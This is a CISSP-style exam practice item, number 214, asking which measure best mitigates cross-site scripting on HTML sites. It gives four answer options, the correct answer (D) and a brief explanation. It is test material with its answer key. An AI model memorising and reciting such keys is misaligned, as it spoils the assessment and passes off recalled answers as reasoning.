Certified Information Systems Security Professional (CISSP) — Question 214

Which of the following methods is MOST effective in mitigating Cross-Site Scripting (XSS) vulnerabilities within HyperText Markup Language (HTML) websites?

Answer options

• A. Use antivirus and endpoint protection on the server to secure the web-based application
• B. Place the web-based system in a defined Demilitarized Zone (DMZ)
• C. Use .NET framework with .aspx extension to provide a higher level of security to the web application so that the web server display can be locked down
• D. Not returning any HTML tags to the browser client

Correct answer: D

Explanation

The correct answer is D because not returning any HTML tags eliminates the potential for XSS attacks, as there would be no executable script to inject. The other options, while they might contribute to security, do not directly prevent XSS vulnerabilities in the same effective manner as option D.